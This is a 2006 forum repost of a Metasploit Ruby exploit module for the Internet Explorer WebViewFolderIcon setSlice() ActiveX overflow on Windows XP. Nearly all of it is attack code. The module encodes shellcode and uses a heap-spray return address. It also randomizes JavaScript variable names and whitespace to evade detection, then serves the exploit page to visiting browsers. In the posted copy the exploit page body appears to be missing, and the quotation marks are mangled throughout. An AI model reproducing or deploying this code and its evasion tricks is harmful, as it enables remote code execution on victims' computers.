标题: MS Internet Explorer WebViewFolderIcon setSlice() Overflow Exploit [打印本页] 作者: 烟圈配咖啡 时间: 2006-9-28 11:11 标题: MS Internet Explorer WebViewFolderIcon setSlice() Overflow Exploit
This module is part of the metasploit framework3
# svn co http://metasploit.com/svn/framework3/trunk/
require ';msf/core';
module Msf
class Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote
include Exploit::Remote::HttpServer::Html
def initialize(info = {})
super(update_info(info,
';Name'; => ';Internet Explorer WebViewFolderIcon setSlice() Overflow';,
';Description'; => %q{
This module exploits a flaw in the WebViewFolderIcon ActiveX control
included with Windows 2000, Windows XP, and Windows 2003. This flaw was published
during the Month of Browser Bugs project (MoBB #18).
},
';License'; => MSF_LICENSE,
';Author'; =>
[
';hdm';,
],
';Version'; => ';$Revision: 3783 $';,
';References'; =>
[
[ ';OSVDB';, ';27110'; ],
[ ';BID';, ';19030'; ],
[ ';URL';, ';http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html'; ]
],
';Payload'; =>
{
';Space'; => 1024,
';BadChars'; => "\x00",
},
';Platform'; => ';win';,
';Targets'; =>
[
[';Windows XP SP0-SP2 / IE 6.0SP1 English';, {';Ret'; => 0x0c0c0c0c} ]
],
';DefaultTarget'; => 0))
end
def autofilter
false
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Get a unicode friendly version of the return address
addr_word = [target.ret].pack(';V';).unpack(';H*';)[0][0,4]
# Randomize the javascript variable names
var_buffer = Rex::Text.rand_text_alpha(rand(30)+2)
var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2)
var_unescape = Rex::Text.rand_text_alpha(rand(30)+2)
var_x = Rex::Text.rand_text_alpha(rand(30)+2)
var_i = Rex::Text.rand_text_alpha(rand(30)+2)
var_tic = Rex::Text.rand_text_alpha(rand(30)+2)
var_toc = Rex::Text.rand_text_alpha(rand(30)+2)
# Randomize HTML data
html = Rex::Text.rand_text_alpha(rand(30)+2)
# Build out the message
content = %Q|
#{html}
|
# Randomize the whitespace in the document
content.gsub!(/\s+/) do |s|
len = rand(100)+2
set = "\x09\x20\x0d\x0a"
buf = ';';
while (buf.length < len)
buf << set[rand(set.length)].chr
end
buf
end
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response(cli, content)
end
end
end
# milw0rm.com [2006-09-27]
